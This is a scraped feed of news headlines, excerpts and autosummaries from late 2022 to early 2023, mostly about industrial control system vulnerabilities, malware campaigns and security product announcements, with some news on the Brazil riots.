    2023-01-21 https://www.bbc.co.uk/news/world-latin-america-64362096?at_medium=RSS&at_campaign=KARANGA
    General Julio Cesar de Arruda is the latest person in the military to lose their position. "

    Autosummary: "

    ---

    CISA Warns of Flaws in Siemens, GE Digital, and Contec Industrial Control Systems

    industry
    2023-01-18 https://thehackernews.com/2023/01/cisa-warns-of-flaws-in-siemens-ge.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published four Industrial Control Systems (ICS) advisories, calling out several security flaws affecting products from Siemens, GE Digital, and Contec. The most critical of the issues have been identified in Siemens SINEC INS that could lead to remote code execution via a path traversal flaw (CVE-2022-45092, CVSS score: 9.9) "

    Autosummary: "

    ---

    Brazil Congress: Dozens indicted over 8 January riot

    latam industry
    2023-01-17 https://www.bbc.co.uk/news/world-latin-america-64299892?at_medium=RSS&at_campaign=KARANGA
    Thirty-nine people are indicted for their alleged involvement in the violence on 8 January. "

    Autosummary: "

    ---

    Nick Cave says ChatGPT"s AI attempt to write Nick Cave lyrics "sucks"

    industry
    2023-01-17 https://www.bbc.co.uk/news/entertainment-arts-64302944?at_medium=RSS&at_campaign=KARANGA
    The musician responds after a popular chatbot produces lyrics "in the style of Nick Cave". "

    Autosummary: "

    ---

    CISA Warns for Flaws Affecting Industrial Control Systems from Major Manufacturers

    industry
    2023-01-16 https://thehackernews.com/2023/01/cisa-warns-for-flaws-affecting.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released several Industrial Control Systems (ICS) advisories warning of critical security flaws affecting products from Sewio, InHand Networks, Sauter Controls, and Siemens. The most severe of the flaws relate to Sewio"s RTLS Studio, which could be exploited by an attacker to "obtain unauthorized access to the server, alter "

    Autosummary: "

    ---

    Industrial espionage: How China sneaks out America"s technology secrets

    industry
    2023-01-16 https://www.bbc.co.uk/news/world-asia-china-64206950?at_medium=RSS&at_campaign=KARANGA
    The true extent of commercial spying is unknown but experts say it is "pervasive". "

    Autosummary: "

    ---

    Brazil riots: Brasília"s ex-security chief arrested on return to city

    latam government industry
    2023-01-14 https://www.bbc.co.uk/news/world-latin-america-64275368?at_medium=RSS&at_campaign=KARANGA
    Anderson Torres is accused of colluding in the storming of Brazil"s congress on 8 January. "

    Autosummary: "

    ---

    Brazil Supreme Court includes Jair Bolsonaro in riot probe

    latam industry
    2023-01-14 https://www.bbc.co.uk/news/world-latin-america-64271922?at_medium=RSS&at_campaign=KARANGA
    For the first time the ex-president is put among those potentially responsible for the riots. "

    Autosummary: "

    ---

    Critical vulnerabilities in Siemens PLC devices could allow bypass of protected boot features (CVE-2022-38773)

    industry
    2023-01-12 https://www.helpnetsecurity.com/2023/01/12/cve-2022-38773/
    

    Red Balloon Security disclosed multiple, critical architectural vulnerabilities in the Siemens SIMATIC and SIPLUS S7-1500 Series PLC that allow for bypass of all protected boot features. These vulnerabilities affect over 120 different models of the Siemens S7-1500 CPU product family. The vulnerable implementation of RoT using a secure cryptographic processor. If the shared cryptographic material is captured, adversaries may use the secure cryptographic processor as an oracle to encrypt and decrypt tampered firmware. Red Balloon … More →

    The post Critical vulnerabilities in Siemens PLC devices could allow bypass of protected boot features (CVE-2022-38773) appeared first on Help Net Security.

    "

    Autosummary: “While these vulnerabilities technically require physical access to exploit, it is possible for sophisticated attackers to ‘chain,’ or combine, these vulnerabilities with other remote access vulnerabilities on the same network to install malicious firmware without the need for in-person contact.” "

    ---

    Over 100 Siemens PLC Models Found Vulnerable to Firmware Takeover

    industry
    2023-01-12 https://thehackernews.com/2023/01/over-100-siemens-plc-models-found.html
    Security researchers have disclosed multiple architectural vulnerabilities in Siemens SIMATIC and SIPLUS S7-1500 programmable logic controllers (PLCs) that could be exploited by a malicious actor to stealthily install firmware on affected devices and take control of them. Discovered by Red Balloon Security, the issues are tracked as CVE-2022-38773 (CVSS score: 4.6), with the low severity "

    Autosummary: "

    ---

    Waterfall Security Solutions partners with Yokogawa to improve industrial security

    industry
    2023-01-11 https://www.helpnetsecurity.com/2023/01/11/waterfall-security-solutions-yokogawa/
    

    Waterfall Security Solutions announced a collaboration agreement with Yokogawa, a provider of industrial automation and test and measurement solutions. This new collaboration will make Waterfall’s Unidirectional Gateway cybersecurity products and technologies available to Yokogawa’s customers globally. In a world where cyber threats to industrial operations continue to become more powerful and more pervasive, making unidirectional protections available more widely will dramatically improve industrial security programs and preparedness. “Operational and technical reliability is a key focus … More →

    The post Waterfall Security Solutions partners with Yokogawa to improve industrial security appeared first on Help Net Security.

    "

    Autosummary: Strong unidirectional security also enables and simplifies Yokogawa’s customers’ compliance with industrial cybersecurity best practices world-wide, including IEC 62443, France’s ANSSI, NERC CIP, the IIoT Security Framework, CENELEC TS 50701, and many more. "

    ---

    Gootkit Loader campaign targets Australian Healthcare Industry

    industry
    2023-01-11 https://securityaffairs.com/140655/malware/gootkit-loader-targets-australia.html
    

    Threat actors are targeting organizations in the Australian healthcare sector with the Gootkit malware loader. Trend Micro researchers warn that Gootkit Loader is actively targeting the Australian healthcare industry. The experts analyzed a series of attacks and discovered that Gootkit leveraged SEO poisoning for its initial access and abused legitimate tools like VLC Media Player. […]

    The post Gootkit Loader campaign targets Australian Healthcare Industry appeared first on Security Affairs.

    "

    Autosummary: “In addition to the continued targeting of the legal sector with the word “agreement”, we also found that the current operation has also clearly sharpened its targeting capability by including the words “hospital”, “health”, “medical”, and names of Australian cities.” "

    ---

    Digital forensics incident readiness

    industry
    2023-01-06 https://www.helpnetsecurity.com/2023/01/06/digital-forensics-incident-readiness-video/
    

    Digital forensics is used to find, examine and analyze digital evidence that can serve in criminal investigations, but also in incident response, investigations of data breaches, to unearth insider threats, etc. Colm Gallagher, Forensics Director, CommSec Communications & Security, talks about the factors that make digital forensics more difficult for law enforcement and industry, and offers advice and lays out practical measures that can increase forensic readiness for all. This video was recorded at IRISSCON … More →

    The post Digital forensics incident readiness appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Microsoft Reveals Tactics Used by 4 Ransomware Families Targeting macOS

    exploits ransomware industry
    2023-01-06 https://thehackernews.com/2023/01/microsoft-reveals-tactics-used-by-4.html
    Microsoft has shed light on four different ransomware families – KeRanger, FileCoder, MacRansom, and EvilQuest – that are known to impact Apple macOS systems. "While these malware families are old, they exemplify the range of capabilities and malicious behavior possible on the platform," the tech giant"s Security Threat Intelligence team said in a Thursday report. The initial vector for these "

    Autosummary: EvilQuest, which was first exposed in July 2020, further goes beyond typical ransomware to incorporate other trojan-like features, such as keylogging, compromising Mach-O files by injecting arbitrary code, and disabling security software. "

    ---

    Hackers Using CAPTCHA Bypass Tactics in Freejacking Campaign on GitHub

    industry
    2023-01-06 https://thehackernews.com/2023/01/hackers-using-captcha-bypass-tactics-in.html
    A South Africa-based threat actor known as Automated Libra has been observed employing CAPTCHA bypass techniques to create GitHub accounts in a programmatic fashion as part of a freejacking campaign dubbed PURPLEURCHIN. The group "primarily targets cloud platforms offering limited-time trials of cloud resources in order to perform their crypto mining operations," Palo Alto Networks Unit 42 "

    Autosummary: Now according to Unit 42, the cloud threat actor group created three to five GitHub accounts every minute at the height of its activity in November 2022, totally setting up over 130,000 bogus accounts across Heroku, Togglebox, and GitHub. "

    ---

    The Evolving Tactics of Vidar Stealer: From Phishing Emails to Social Media

    financial industry
    2023-01-05 https://thehackernews.com/2023/01/the-evolving-tactics-of-vidar-stealer.html
    The notorious information-stealer known as Vidar is continuing to leverage popular social media services such as TikTok, Telegram, Steam, and Mastodon as an intermediate command-and-control (C2) server. "When a user creates an account on an online platform, a unique account page that can be accessed by anyone is generated," AhnLab Security Emergency Response Center (ASEC) disclosed in a "

    Autosummary: "After information collection is complete, the extorted information is compressed into a ZIP file, encoded in Base64, and transmitted to the C2 server," ASEC researchers said. "

    ---

    The cybersecurity industry will undergo significant changes in 2023

    industry ciber
    2023-01-03 https://www.helpnetsecurity.com/2023/01/03/cybersecurity-industry-2023/
    

    The cybersecurity industry will undergo some significant changes in 2023. As more systems get connected, we can expect to see more outages. We probably won’t see a “digital Pearl Harbor,” but we will see more breaches, impact, and fear. How will this reshape the cybersecurity industry in the year ahead? Consolidation across the infosec industry Since the infosec sector is “hot,” investment has poured into it as everyone tries to get in on the action. … More →

    The post The cybersecurity industry will undergo significant changes in 2023 appeared first on Help Net Security.

    "

    Autosummary: For example, we had some valuable intelligence for an entire sector, went to the organization responsible for sharing info, and offered to provide it for free (literally write it an email, and they can share it).Tied to this, as budgets shrink, crazy salaries will no longer be paid, which is probably going to mean people think certs are a way to return to the crazy salary, and we end up with this vicious cycle. "

    ---

    MediaTek introduces Genio 700 for industrial and smart home products

    industry
    2023-01-03 https://www.helpnetsecurity.com/2023/01/03/mediatek-genio-700/
    

    MediaTek announced the latest chipset in the Genio platform for IoT devices, the octa-core Genio 700 designed for smart home, smart retail, and industrial IoT products. With a focus on power efficiency, the MediaTek Genio 700 is a N6 (6nm) IoT chipset that boasts two ARM A78 cores running at 2.2GHz and six ARM A55 cores at 2.0GHz while providing 4.0 TOPs AI accelerator. It comes with support for FHD60+4K60 display, as well as an … More →

    The post MediaTek introduces Genio 700 for industrial and smart home products appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    German industrial giant ThyssenKrupp targeted in a new cyberattack

    industry ciber
    2022-12-21 https://securityaffairs.co/wordpress/139870/hacking/thyssenkrupp-targeted-cyberattack.html
    

    German multinational industrial engineering and steel production company ThyssenKrupp AG was the target of a cyberattack. German multinational industrial engineering and steel production giant ThyssenKrupp AG announced that the Materials Services division and corporate headquarters were hit by a cyberattack. At this time the company has yet to disclose the type of attack that hit […]

    The post German industrial giant ThyssenKrupp targeted in a new cyberattack appeared first on Security Affairs.

    "

    Autosummary: “At the present time, no damage has been done, nor are there any indications that data has been stolen or modified,” This isn’t the first attack suffered by the company, in 2012, the company was targeted by another cyber attack that was classified as “heavy” and of “exceptional quality.” "

    ---

    Colombian energy supplier EPM hit by BlackCat ransomware attack

    exploits latam ransomware industry
    2022-12-16 https://www.bleepingcomputer.com/news/security/colombian-energy-supplier-epm-hit-by-blackcat-ransomware-attack/
    Colombian energy company Empresas Públicas de Medellín (EPM) suffered a BlackCat/ALPHV ransomware attack on Monday, disrupting the company"s operations and taking down online services. [...] "

    Autosummary: BlackCat ransomware behind the attack BleepingComputer has since learned that the BlackCat ransomware operation, aka ALPHV, was behind the attacks, claiming to have stolen corporate data during the attacks. "

    ---

    Product showcase: Searchable encryption in Elasticsearch and OpenSearch with IronCore Labs

    industry
    2022-12-15 https://www.helpnetsecurity.com/2022/12/15/product-showcase-searchable-encryption-ironcore-labs/
    

    When it comes to sensitive data, search services are the ultimate treasure trove for hackers. Why slowly sift through information when a search service has indexed it all for you? Mistakes are inevitable and cloud misconfigurations are the number one cause of data breaches. The number two cause is when insider credentials are stolen. In either case, having your sensitive data encrypted can provide the defense-in-depth you need to prevent a mistake from becoming a … More →

    The post Product showcase: Searchable encryption in Elasticsearch and OpenSearch with IronCore Labs appeared first on Help Net Security.

    "

    Autosummary: Quick look: What you need to know about Cloaked Search Cloaked Search is a transparent proxy that encrypts data before it goes to Elasticsearch or OpenSearch while still allowing you to search that data; no plugins required Choose which indices and fields to encrypt while the rest pass through normally, so you can start with your most sensitive data and expand over time Perfect as a PET (privacy enhancing technology) for safeguarding personal information and complying with global privacy laws and data sovereignty concerns Protects against breaches, unauthorized insider access, injection attacks, and cloud misconfigurations How Cloaked Search works Cloaked Search uses encryption-in-use techniques to allow searching over encrypted data without decrypting it. Supported search functionality All of the advanced search functionality you rely on remains available to you over the Cloaked Search encrypted data, including field matching, phonetic matching, exact phrase matching, boolean queries, subdocument searches, autocompletion, wildcard searches, field boosting, and more. "

    ---

    Axiomatics Orchestrated Authorization enhancements centralize authorization strategy

    industry
    2022-12-12 https://www.helpnetsecurity.com/2022/12/12/axiomatics-orchestrated-authorization-strategy/
    

    Axiomatics has introduced the next evolution of its Orchestrated Authorization strategy. Through new capabilities and enhancements to the authorization solution, Axiomatics now offers the adaptable and scalable implementation of fine-grained access control (FGAC). This enables enterprises to centralize their authorization strategy while decentralizing policy modeling, testing, deployment, and analysis. “With increased adoption of zero trust, policies related to access control and risk can no longer be confined to identity and access management (IAM) or security … More →

    The post Axiomatics Orchestrated Authorization enhancements centralize authorization strategy appeared first on Help Net Security.

    "

    Autosummary: “With increased adoption of zero trust, policies related to access control and risk can no longer be confined to identity and access management (IAM) or security teams alone, but require support from the broader enterprise, including both development and the business,” said Mark Cassetta, chief product officer for Axiomatics. "

    ---

    MuddyWater Hackers Target Asian and Middle East Countries with Updated Tactics

    industry
    2022-12-09 https://thehackernews.com/2022/12/muddywater-hackers-target-asian-and.html
    The Iran-linked MuddyWater threat actor has been observed targeting several countries in the Middle East as well as Central and West Asia as part of a new spear-phishing activity. "The campaign has been observed targeting Armenia, Azerbaijan, Egypt, Iraq, Israel, Jordan, Oman, Qatar, Tajikistan, and the United Arab Emirates," Deep Instinct researcher Simon Kenin said in a technical write-up. "

    Autosummary: "

    ---

    Diamond industry under attack – Week in security with Tony Anscombe

    industry
    2022-12-09 https://www.welivesecurity.com/videos/diamond-industry-attack-week-security-tony-anscombe/
    

    ESET researchers uncover a new wiper and its execution tool, both attributed to the Iran-aligned Agrius APT group

    The post Diamond industry under attack – Week in security with Tony Anscombe appeared first on WeLiveSecurity

    "

    Autosummary: "

    ---

    How IoT is changing the threat landscape for businesses

    industry
    2022-12-08 https://www.helpnetsecurity.com/2022/12/08/iot-threat-landscape-businesses-video/
    

    Where IoT-enabled devices connect to wider networks, their potential functionalities are immense, with countless applications across various industries, including production and manufacturing, healthcare, finance, and energy. In this Help Net Security video, Paul Keely, Chief Cloud Officer at Open Systems, talks about how organizations that employ IoT technology have improved their business efficiency. Still, all this data introduces a new challenge – security. While IoT presents organizations with new ways to advance and optimize, the … More →

    The post How IoT is changing the threat landscape for businesses appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Iranian Hackers Strike Diamond Industry with Data-Wiping Malware in Supply-Chain Attack

    exploits industry
    2022-12-08 https://thehackernews.com/2022/12/iranian-hackers-strike-diamond-industry.html
    An Iranian advanced persistent threat (APT) actor known as Agrius has been attributed as behind a set of data wiper attacks aimed at diamond industries in South Africa, Israel, and Hong Kong. The wiper, codenamed Fantasy by ESET, is believed to have been delivered via a supply chain attack targeting an Israeli software suite developer as part of a campaign that began in February 2022. Victims "

    Autosummary: Agrius, the Iran-aligned group behind the intrusions, has been active since at least December 2020 and leverages known security flaws in internet-facing applications to drop web shells that are, in turn, used to facilitate reconnaissance, lateral movement, and the delivery of final-stage payloads. "

    ---

    Palo Alto Networks Medical IoT Security protects connected medical devices

    industry
    2022-12-07 https://www.helpnetsecurity.com/2022/12/07/palo-alto-networks-medical-iot-security/
    

    Palo Alto Networks has released Medical IoT Security — the zero trust security solution for medical devices — enabling healthcare organizations to deploy and manage new connected technologies. Zero trust is a strategic approach to cybersecurity that secures an organization by eliminating implicit trust by continuously verifying every user and device. “The proliferation of connected medical devices in the healthcare industry brings a wealth of benefits, but these devices are often not well secured. For … More →

    The post Palo Alto Networks Medical IoT Security protects connected medical devices appeared first on Help Net Security.

    "

    Autosummary: Easily understand medical device vulnerabilities, patch status and security settings, and then get recommendations to bring devices into compliance with rules and guidelines, such as the Health Insurance Portability Accountability Act (HIPAA), General Data Protection Regulation (GDPR), and similar laws and regulations.For example, according to Unit 42, an alarming 75% of smart infusion pumps examined on the networks of hospitals and healthcare organizations had known security gaps,” said Anand Oswal, senior vice president of products, network security at Palo Alto Networks. "

    ---

    New Go-based Zerobot Botnet Exploiting Dozen of IoT Vulnerabilities to Expand its Network

    exploits industry
    2022-12-07 https://thehackernews.com/2022/12/new-go-based-zerobot-botnet-exploiting.html
    A novel Go-based botnet called Zerobot has been observed in the wild proliferating by taking advantage of nearly two dozen security vulnerabilities in the internet of things (IoT) devices and other software. The botnet "contains several modules, including self-replication, attacks for different protocols, and self-propagation," Fortinet FortiGuard Labs researcher Cara Lin said. "It also "

    Autosummary: "

    ---

    Microsoft Alerts Cryptocurrency Industry of Targeted Cyberattacks

    industry ciber
    2022-12-07 https://thehackernews.com/2022/12/microsoft-alerts-cryptocurrency.html
    Cryptocurrency investment companies are the target of a developing threat cluster that uses Telegram groups to seek out potential victims. Microsoft"s Security Threat Intelligence Center (MSTIC) is tracking the activity under the name DEV-0139, and builds upon a recent report from Volexity that attributed the same set of attacks to North Korea"s Lazarus Group. "DEV-0139 joined Telegram groups "

    Autosummary: " In recent years, Telegram has not only witnessed widespread adoption in the cryptocurrency industry, but also been co-opted by threat actors looking to discuss zero-day vulnerabilities, offer stolen data, and market their services through the popular messaging platform. "

    ---

    Iranian State Hackers Targeting Key Figures in Activism, Journalism, and Politics

    government industry
    2022-12-06 https://thehackernews.com/2022/12/iranian-state-hackers-targeting-key.html
    Hackers with ties to the Iranian government have been linked to an ongoing social engineering and credential phishing campaign directed against human rights activists, journalists, researchers, academics, diplomats, and politicians working in the Middle East. At least 20 individuals are believed to have been targeted, Human Rights Watch (HRW) said in a report published Monday, attributing the "

    Autosummary: "In a Middle East region rife with surveillance threats for activists, it"s essential for digital security researchers to not only publish and promote findings, but also prioritize the protection of the region"s embattled activists, journalists, and civil society leaders," Ghattas said. "

    ---

    Vehicle Identification Numbers reveal driver data via telematics

    industry
    2022-12-06 https://www.malwarebytes.com/blog/news/2022/12/vehicle-identification-numbers-reveal-driver-data-via-telematics
    

    Categories: News Tags: VIN Tags: vehicle identification number Tags: car Tags: telematics Tags: SiriusXM Tags: data We take a look at reports of vehicle identification numbers being used to potentially reveal customer data through telematics. (Read more...)

    The post Vehicle Identification Numbers reveal driver data via telematics appeared first on Malwarebytes Labs.

    "

    Autosummary: Earlier this year, we were able to remotely unlock, start, locate, flash, and honk any remotely connected Honda, Nissan, Infiniti, and Acura vehicles, completely unauthorized, knowing only the VIN number of the car.Worse, using the VIN in this way was enough to pull up the customer’s name, phone number, address, and car details.Can you imagine anyone doing this now, as opposed to using business addresses, PO boxes, or domain privacy services in the age of trolling, doxxing, and swatting? Here"s how we found it, and how it works: pic.twitter.com/ul3A4sT47k — Sam Curry (@samwcyo) November 30, 2022 As with so many interesting system exploits, the weak spot is a service being made use of by many. "

    ---

    New BMC Supply Chain Vulnerabilities Affect Servers from Dozens of Manufacturers

    industry
    2022-12-05 https://thehackernews.com/2022/12/new-bmc-supply-chain-vulnerabilities.html
    Three different security flaws have been disclosed in American Megatrends (AMI) MegaRAC Baseboard Management Controller (BMC) software that could lead to remote code execution on vulnerable servers. "The impact of exploiting these vulnerabilities include remote control of compromised servers, remote deployment of malware, ransomware and firmware implants, and server physical damage (bricking)," "

    Autosummary: "

    ---

    Biometrics are even less accurate than we thought

    industry
    2022-12-05 https://www.computerworld.com/article/3682149/biometrics-are-even-less-accurate-than-we-thought.html#tk.rss_security
    

    Biometrics is supposed to be one of the underpinnings of a modern authentication system. But many biometric implementations (whether that be fingerprint scanes or face recognition) can be wildly inaccurate, and the only universally positive thing to say about them is they"re better than nothing.

    Also — and this may prove critical — the fact that biometrics are falsely seen as being very accurate may be sufficient to dissuade some fraud attempts. 

    There are a variety of practical reasons biometrics don"t work well in the real world, and a recent post by a cybersecurity specialist at KnowBe4, a security awareness training vendor, adds a new layer of complexity to the biometrics issue.

    To read this article in full, please click here

    "

    Autosummary: On top of that, many vendors, including Apple (iOS) and Google (Android), make marketing choices in their settings, where they choose how stringent or lenient the authentication is. There are a variety of practical reasons biometrics don"t work well in the real world, and a recent post by a cybersecurity specialist at KnowBe4, a security awareness training vendor, adds a new layer of complexity to the biometrics issue. "So far, none of the submitted candidates come anywhere close,” Grimes wrote, summarizing the NIST findings. In other words, if a thief wants to get around biometrics, all he or she has to do is fail once or twice and then deal with the easier-to-crack PIN. "

    ---

    DHS Cyber Safety Board to review Lapsus$ gang’s hacking tactics

    industry
    2022-12-02 https://www.bleepingcomputer.com/news/security/dhs-cyber-safety-board-to-review-lapsus-gang-s-hacking-tactics/
    The Department of Homeland Security (DHS) Cyber Safety Review Board will review attacks linked to an extortion group known as Lapsus$, which breached multiple high-profile companies in recent attacks. [...] "

    Autosummary: The Lapsus$ hacker group made the news earlier this year after hacking Microsoft, Nvidia, T-Mobile, Samsung, Uber, Vodafone, Ubisoft, Okta, and e-commerce giant Mercado Libre. "

    ---

    CISA Warns of Multiple Critical Vulnerabilities Affecting Mitsubishi Electric PLCs

    industry
    2022-12-02 https://thehackernews.com/2022/12/cisa-warns-of-multiple-critical.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week released an Industrial Control Systems (ICS) advisory warning of multiple vulnerabilities in Mitsubishi Electric GX Works3 engineering software. "Successful exploitation of these vulnerabilities could allow unauthorized users to gain access to the MELSEC iQ-R/F/L series CPU modules and the MELSEC iQ-R series OPC UA server "

    Autosummary: "

    ---

    Top tips to save energy used by your electronic devices

    industry
    2022-12-01 https://www.welivesecurity.com/2022/12/01/top-tips-save-energy-electronic-devices/
    

    With the rapidly rising energy prices putting a strain on many households, what are some quick wins to help reduce the power consumption of your gadgets?

    The post Top tips to save energy used by your electronic devices appeared first on WeLiveSecurity

    "

    Autosummary: Use laptops, rather than desktop computers, as they use less energy, according to the US government. With inflation starting to hit home and bills on the rise across Europe, consumers in some countries are being asked by their governments to try and cut back on energy use where possible amid fears of power blackouts.Here are some ideas: If you’re on the hunt for new gadgets, look for energy efficient kit by checking for Energy Star accreditation and/or a good rating on the EU’s energy labelling scheme. "

    ---

    IoT device origin matters more than ever

    industry
    2022-11-30 https://www.helpnetsecurity.com/2022/11/30/iot-device-origin/
    

    Recently, British politicians called on the government to crack down on the use of surveillance equipment from two Chinese companies, Hikvision and Dahua, which are already blacklisted by Washington. Not only did ministers criticize the state-owned companies as national security and cybersecurity threats, but they also brought into question their human rights record. This story is not an outlier. From hard-coded admin passwords to “always-on” cloud features, cheap smart / connected devices with limited privacy … More →

    The post IoT device origin matters more than ever appeared first on Help Net Security.

    "

    Autosummary: Recently, British politicians called on the government to crack down on the use of surveillance equipment from two Chinese companies, Hikvision and Dahua, which are already blacklisted by Washington.Powered by smaller, cheaper, and more efficient components, most of this growth comes from Chinese companies.From hard-coded admin passwords to “always-on” cloud features, cheap smart / connected devices with limited privacy or regulatory standards – largely from the Asian superpower – have flooded the market over the past decade. "

    ---

    How the dynamics of phishing attacks are changing

    financial industry
    2022-11-28 https://www.helpnetsecurity.com/2022/11/28/phishing-attacks-impact-video/
    

    In this Help Net Security video, Alex Paquette, COO at Ironscales, discusses the impact in terms of the time and energy required to defend against the never-ending and ever-evolving onslaught of phishing attacks. A recent study conducted by Osterman Research found that IT and security teams spend one-third of their time handling phishing threats every week. 70% of organizations spend 16-60 minutes dealing with a single phishing email message. Almost half of the respondents state … More →

    The post How the dynamics of phishing attacks are changing appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Over a Dozen New BMC Firmware Flaws Expose OT and IoT Devices to Remote Attacks

    industry
    2022-11-28 https://thehackernews.com/2022/11/over-dozen-new-bmc-firmware-flaws.html
    Over a dozen security flaws have been discovered in baseboard management controller (BMC) firmware from Lanner that could expose operational technology (OT) and internet of things (IoT) networks to remote attacks. BMC refers to a specialized service processor, a system-on-chip (SoC), that"s found in server motherboards and is used for remote monitoring and management of a host system, including "

    Autosummary: "

    ---

    OneTrust partners with ECI to help companies evaluate their ethics and compliance programs

    industry
    2022-11-23 https://www.helpnetsecurity.com/2022/11/23/onetrust-eci/
    

    OneTrust is partnering with the Ethics & Compliance Initiative (ECI), the global non-profit organization that empowers organizations to build and sustain cultures of integrity. The partnership enables OneTrust to offer its customers the ECI High-Quality Ethics & Compliance Program (HQP) Assessment tool, which helps organizations evaluate their ethics and compliance programs and determine their level of maturity. ECI has led the effort for organizations to identify and adopt high-quality ethics and compliance programs for many … More →

    The post OneTrust partners with ECI to help companies evaluate their ethics and compliance programs appeared first on Help Net Security.

    "

    Autosummary: The OneTrust Ethics and Compliance Cloud brings together ethics program management, speak-up culture assurance, and third-party due diligence to unify people, processes, and technology across ethics, compliance, HR, and legal teams. "

    ---

    Experts claim that iPhone’s analytics data is not anonymous

    industry
    2022-11-23 https://securityaffairs.co/wordpress/138884/digital-id/iphone-found-collecting-personal-data.html
    

    Researchers discovered that analytics data associated with iPhone include Directory Services Identifier (DSID) that could allow identifying users. Researchers at software company Mysk discovered that analytics data collected by iPhone include the Directory Services Identifier (DSID), which could allow identifying users. Apple collects both DSID and Apple ID, which means that it can use the […]

    The post Experts claim that iPhone’s analytics data is not anonymous appeared first on Security Affairs.

    "

    Autosummary: Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    Hackers breach energy orgs via bugs in discontinued web server

    exploits industry
    2022-11-22 https://www.bleepingcomputer.com/news/security/hackers-breach-energy-orgs-via-bugs-in-discontinued-web-server/
    Microsoft said today that security vulnerabilities found to impact a web server discontinued since 2005 have been used to target and compromise organizations in the energy sector. [...] "

    Autosummary: "To achieve this, the group likely compromised and co-opted internet-facing DVR/IP camera devices for command and control (C2) of Shadowpad malware infections, as well as use of the open source tool FastReverseProxy" Attacks linked to Boa web server flaws While Recorded Future didn"t expand on the attack vector, Microsoft said today that the attackers exploited a vulnerable component in the Boa web server, a software solution discontinued since 2015 that"s still being used by IoT devices (from routers to cameras). "

    ---

    Resecurity collaborates with CyberKSA to combat threats targeting the industry

    industry
    2022-11-17 https://www.helpnetsecurity.com/2022/11/17/resecurity-cyberksa/
    

    Resecurity has partnered with Saudi Cybersecurity Company (CyberKSA), a cybersecurity provider in the Kingdom of Saudi Arabia (KSA). The partnership will allow CyberKSA to offer award-winning cyber threat intelligence (CTI), dark web monitoring (DWM), digital risk management (DRM), fraud prevention (FP) and identity protection (IDP) products to consumer and enterprise organizations. The comprehensive portfolio of solutions will accelerate specialized offerings for MSSPs/ISPs and large enterprise customers looking to streamline their cybersecurity operations across their environment. … More →

    The post Resecurity collaborates with CyberKSA to combat threats targeting the industry appeared first on Help Net Security.

    "

    Autosummary: To reduce fragmentation, Resecurity is following a unified platform-as-a-service (PaaS) model, combining critical components of security service edge (SSE) and scalable data lake containing a massive volume of actionable cyber threat intelligence data and associated telemetry useful for implementation into security information and event management (SIEM), security operations center (SOC), cyber fusion center (CFS) and third-party systems and applications. "

    ---

    Micron Authenta enhancements boost end-to-end cloud services across the IoT ecosystem

    industry
    2022-11-16 https://www.helpnetsecurity.com/2022/11/16/micron-technology-authenta/
    

    Micron Technology expands portfolio for its silicon root-of-trust solution, Authenta, making its cloud-based internet of things (IoT) security offerings more widely accessible. Micron is enabling Authenta in a family of Serial Peripheral Interface NOR (SPI-NOR) devices with increased density and packaging options and unveiling the Authenta Cloud Platform to help enterprises deploy and scale trust-based security at the intelligent edge. The company is also collaborating with security solutions expert Swissbit AG and new customer SanCloud … More →

    The post Micron Authenta enhancements boost end-to-end cloud services across the IoT ecosystem appeared first on Help Net Security.

    "

    Autosummary: Swissbit, a leading European security and memory solution provider for IoT applications, and Micron are also now collaborating to embed Authenta technology in Swissbit’s security and storage solutions for IoT and industrial markets — bringing Micron’s unique silicon root-of-trust security features to Swissbit’s broad base of customers across areas such as industrial automation, automotive, IoT, medical, networking and communication. "

    ---

    Microsoft Supply Chain Platform helps organizations fix logistics and inventory problems

    industry
    2022-11-16 https://www.helpnetsecurity.com/2022/11/16/microsoft-supply-chain-platform-helps-organizations-fix-logistics-and-inventory-problems/
    

    Microsoft announced the Microsoft Supply Chain Platform, which helps organizations maximize their supply chain data estate investment with an open approach, bringing the best of Microsoft AI, collaboration, low-code, security and SaaS applications in a composable platform. The company also announced the preview of Microsoft Supply Chain Center, a ready-made command center for supply chain visibility and transformation and part of the Microsoft Supply Chain Platform. Supply Chain Center is designed to work natively with … More →

    The post Microsoft Supply Chain Platform helps organizations fix logistics and inventory problems appeared first on Help Net Security.

    "

    Autosummary: In addition, to help customers find the best solution for their supply chain needs, Microsoft will continue to work with solution providers such as Blue Yonder, Cosmo Tech, Experlogix, Flintfox, inVia Robotics, K3, O9 Solutions, SAS, Sonata, To-Increase Software and many more. Accelerating business agility with the Microsoft Supply Chain Center At the core of the Supply Chain Platform is the Microsoft Supply Chain Center, now available in preview, which provides a command center experience for practitioners to harmonize data from across existing infrastructure supply chain systems, such as data from Dynamics 365, and other ERP providers, including SAP and Oracle, along with standalone supply chain systems. "

    ---

    Alif Semiconductor partners with Telit to develop and deploy IoT edge devices

    industry
    2022-11-16 https://www.helpnetsecurity.com/2022/11/16/alif-semiconductor-telit/
    

    Alif has collaborated with Telit to deliver developer kits that provide cloud-connected hardware and software reference designs for a wide variety of distributed and IoT edge applications. The kits focus on connected AI/ML-enhanced vision, voice, vibration, and sensor applications such as AI cameras, smart home, city infrastructure, biometric access control, and wearables. The kits leverage the Alif Ensemble family of microcontrollers (MCUs) and fusion processors. Ensemble devices utilize innovative aiPM power management technology that feature … More →

    The post Alif Semiconductor partners with Telit to develop and deploy IoT edge devices appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Electronics repair technicians snoop on your data

    industry
    2022-11-16 https://www.helpnetsecurity.com/2022/11/16/computer-smartphone-repair-data-privacy/
    

    When your computer or smartphone needs repairing, can you trust repair technicians not to access or steal your personal data? According to the results of a recent research by scientists with University of Guelph, Canada, you shouldn’t. Granted, they tested only 16 repair service providers with rigged devices, but in six cases technicians snooped on customers’ data and in two they copied the data to external devices. Oh, and most of them tried to cover … More →

    The post Electronics repair technicians snoop on your data appeared first on Help Net Security.

    "

    Autosummary: First they asked 18 repair service providers – national (big-box stores), regional (stores of a larger chain), local (mom-and-pop shops), and device manufacturers – whether they have a privacy policy or have set up controls to protect device owners’ personal data from snooping technicians, and found that most have not. "

    ---

    Phosphorus and Redapt join forces to deliver xIoT security to US enterprises

    industry
